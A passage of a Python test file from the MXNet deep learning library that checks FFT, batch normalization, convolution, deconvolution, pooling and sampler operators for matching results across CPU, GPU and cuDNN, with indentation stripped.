out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10087")
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_disabled()
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
